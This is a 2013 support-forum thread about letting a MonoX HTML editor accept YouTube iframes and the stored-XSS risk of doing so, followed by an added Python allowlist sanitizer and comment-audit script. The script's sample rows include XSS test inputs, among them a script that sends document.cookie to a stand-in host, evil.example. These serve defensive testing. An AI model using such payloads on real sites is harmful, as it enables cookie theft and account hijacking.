Mono Support How to customize the HTML Editor to allow posting embedded codes (iframe) from Youtube? 

Viewed 31672 time(s), 11 post(s), 11/9/2013 3:55:11 AM - by bkkmono
11/9/2013 4:14:20 AM
434 Reputation 51 Total posts

Hello,

I tried to post an embedded code from YouTube in the Html Editor while creating a topic post in a Discussion Board, but the code was encoded into words instead of the iframe code being interpreted to display a video clip. I know that the Html Editor in the text area of a discussion board uses CustomRadEditor to show the editor tools, but I don't know how to add or remove each function in the Html Editor.

How to customize the HTML Editor to allow posting embedded codes (iframe) from Youtube?

1
11/9/2013 6:44:26 AM
15993 Reputation 2214 Total posts

You will have to enable html mode on that editor in order to post that type of content.

Regards

2
11/9/2013 2:07:32 PM
434 Reputation 51 Total posts

OK, I get it. I edited this XML file: "DiscussionRadEditorToolsFile.xml" to add or remove tools in it.

3
11/9/2013 7:02:27 PM
2793 Reputation 345 Total posts

If it allows you to enter ANY HTML you should be careful where you allow it. People could inject unwanted/malicious behaviour into your website like that.

4
11/9/2013 9:22:12 PM
434 Reputation 51 Total posts

Thank you Zoomicon for the suggestion. I think JavaScript is disabled by default, although HTML is allowed to be posted. I just tested by posting JavaScript code in a blog post; it vanished and didn't work.

However, this would be clearer if MonoX's staff answered this concern.

5
11/9/2013 9:40:47 PM
434 Reputation 51 Total posts

Bad news update: I just tested adding JavaScript code in a blog comment. The result is that JavaScript can be run on MonoX by everyone!!

As a result, a spammer could attack my site by posting malicious JavaScript code in a blog comment.

6
11/9/2013 11:18:26 PM
434 Reputation 51 Total posts

I added ValidateRequest="true" to the <%@ Page %> directive of Blog.aspx in order to prevent users from posting JavaScript code or even HTML code in comments on blog posts. It is working fine.

7
11/10/2013 9:43:39 AM
15993 Reputation 2214 Total posts

Hi,

Did you try to post the JavaScript in blog comments while logged in as Administrator, as an ordinary user, or while not logged in at all?

Btw, officially the support team is not working over the weekend.

Thanks for the feedback.

8
11/11/2013 8:30:37 AM
15993 Reputation 2214 Total posts

Just to confirm: posting a comment on a Blog as an unauthenticated user doesn't allow you to inject any kind of JavaScript.

Please let us know how you managed to "inject" any kind of JavaScript in the comment, as per my previous question.

Thanks

9
11/11/2013 9:35:00 AM
2793 Reputation 345 Total posts

Do you mean unauthorized (non-admin or without some extra roles?) when you say unauthenticated?

Because registering as a user is usually free and doesn't stop an attacker.

Also, social engineering might trick a moderator, so I'd prefer the default to be only for admins, or even turned off in web.config or something.

How can one check (some SQL query maybe?) for already injected JavaScript?

Btw, even allowing object and embed can deface a site or trick the user etc. (or do some XSS exploit depending on the web browser), so they should be at the same level of protection as scripts and other HTML (e.g. you wouldn't want a float in a comment to go over your content).
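The warning in post 3 (letting the editor accept any HTML lets anyone inject script) and the question in post 9 (how to check for already injected JavaScript) come down to the same decision: what to keep and what to strip. The following is an added example, not MonoX code, of an allowlist sanitizer in Python that keeps basic formatting plus `<iframe>` elements whose src is an https YouTube embed URL, drops everything else (script/style/object bodies, all `on*` handlers, `javascript:` links, iframes pointing anywhere else), and logs what it removed. Run over stored comment rows, a non-empty removal list flags a comment worth looking at. The tag and host allowlists and the `SAMPLE_COMMENTS` rows are constructed for the example.

```python
"""Allowlist HTML sanitizer for blog/forum comments (added example, not MonoX code)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlists: formatting tags plus a YouTube embed iframe, nothing else.
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "blockquote", "a", "iframe"}
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "iframe": {"src", "width", "height", "frameborder", "allowfullscreen"},
}
VOID_TAGS = {"br"}
# Elements whose text content must go too (script bodies, CSS, plugin fallback).
DROP_WITH_CONTENT = {"script", "style", "object", "svg", "math", "textarea", "noscript"}
EMBED_HOSTS = {"www.youtube.com", "youtube.com", "www.youtube-nocookie.com"}


def safe_embed_src(url: str) -> bool:
    """Only https YouTube player URLs pass; javascript:, data:, other hosts fail."""
    p = urlparse(url.strip())
    return p.scheme == "https" and p.hostname in EMBED_HOSTS and p.path.startswith("/embed/")


def safe_link(url: str) -> bool:
    """Absolute http(s)/mailto only. javascript:, vbscript:, data: and obfuscated
    schemes (tabs or newlines inside the scheme) all fail the allowlist."""
    return urlparse(url.strip()).scheme in {"http", "https", "mailto"}


class CommentSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitized fragments
        self.removed = []  # audit log of what was stripped
        self.open = []     # allowed tags currently open, so output stays balanced
        self.skip = 0      # >0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip:
            if tag in DROP_WITH_CONTENT:
                self.skip += 1
            return
        if tag in DROP_WITH_CONTENT:       # unterminated ones fail closed: rest of comment is dropped
            self.skip = 1
            self.removed.append(f"<{tag}> with its content")
            return
        if tag not in ALLOWED_TAGS:        # tag (and all its attributes) dropped, its text kept
            self.removed.append(f"<{tag}>")
            return
        kept = {}
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.removed.append(f"{name} on <{tag}>")   # covers every on* handler and style
            elif tag == "iframe" and name == "src" and not safe_embed_src(value):
                self.removed.append(f"<iframe src={value!r}>")
                return                                      # whole iframe dropped
            elif tag == "a" and name == "href" and not safe_link(value):
                self.removed.append(f"<a href={value!r}>")
            else:
                kept[name] = value
        if tag == "iframe" and "src" not in kept:
            self.removed.append("<iframe> without src")
            return
        attr_text = "".join(f' {n}="{escape(v)}"' for n, v in kept.items())
        self.out.append(f"<{tag}{attr_text}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if self.skip:
            if tag in DROP_WITH_CONTENT:
                self.skip -= 1
            return
        if tag in self.open:
            while True:                    # close anything still open inside it
                t = self.open.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))  # text is re-escaped, so a literal &lt;script&gt; stays inert

    # comments, doctypes, CDATA and processing instructions hit the default no-op handlers

    def result(self) -> str:
        self.close()
        while self.open:
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(html: str):
    """Return (clean_html, list_of_removed_items)."""
    s = CommentSanitizer()
    s.feed(html)
    return s.result(), s.removed


def audit(rows):
    """Scan stored (id, body) rows; ids whose body had something stripped are returned
    with the removal log, which answers 'how can one check for injected JavaScript'."""
    flagged = {}
    for cid, body in rows:
        removed = sanitize(body)[1]
        if removed:
            flagged[cid] = removed
    return flagged


# Constructed sample rows standing in for the blog-comment table.
SAMPLE_COMMENTS = [
    (1, '<p>Great video: <iframe src="https://www.youtube.com/embed/VIDEO_ID" width="560" height="315" allowfullscreen></iframe></p>'),
    (2, 'Nice post!<script>document.location="https://evil.example/?c="+document.cookie</script>'),
    (3, '<img src="x" onerror="alert(1)">'),
    (4, '<a href="javascript:alert(1)">click me</a>'),
    (5, '<p>Plain <b>comment</b> with &lt;script&gt; already escaped</p>'),
]

if __name__ == "__main__":
    for cid, removed in audit(SAMPLE_COMMENTS).items():
        print(cid, removed)
```

The sanitizer runs on the server at save time, independent of whatever tools the editor exposes, so turning html mode on in the toolbar XML does not widen what reaches the database. Blanket request validation, as in post 6, is the coarser alternative: it rejects the YouTube iframe along with the script.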
